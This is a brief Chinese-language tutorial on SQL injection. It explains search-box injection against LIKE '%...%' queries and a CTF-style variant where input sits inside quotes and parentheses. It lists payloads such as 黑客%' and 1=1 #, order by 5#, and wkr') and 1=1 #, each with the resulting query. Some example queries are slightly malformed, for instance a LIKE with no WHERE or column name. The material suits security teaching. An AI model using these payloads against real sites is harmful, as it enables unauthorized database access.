搜索型注入:
一般存在于搜索商品或者文章等的搜索框内。
搜索sql语句为:select * from news like ‘%内容%’,可以看到内容被单引号和百分号括起来的,因此要考虑闭合单引号和百分号,百分号为通配符不闭合也可以。
payload:黑客%’ and 1=1 #
对应sql语句:select * from news like ‘%黑客%’ and 1=1 #%’,由此看到黑客的字符内容被完整的闭合了,and 1=1成立返回正常页面。
payload:黑客%’ and 1=2 #
对应sql语句:select * from news like ‘%黑客%’ and 1=2 #%’,由此看到黑客的字符内容被完整的闭合了,and 1=2 不成立返回错误页面。
下面的测试和字符型与数字型手法一样:黑客%’ order by 5#等等。
XX型注入:
一般在CTF中常见。
sql语句为:select * from user where name=(‘$_GET[“name”]’);
看以上语句,首先考虑的问题就是先闭合单引号再闭合右括号,闭合的情况,最后一定要加注释符。
payload:wkr’) and 1=1 #
对应sql语句:select * from user where =(‘wkr’) and 1=1#’),由此可看到,前面的括号单引号完整的闭合了,之后可以输入我们任意拼接的sql语句了,注意最后一定要加注释符把后面的’)给注释掉。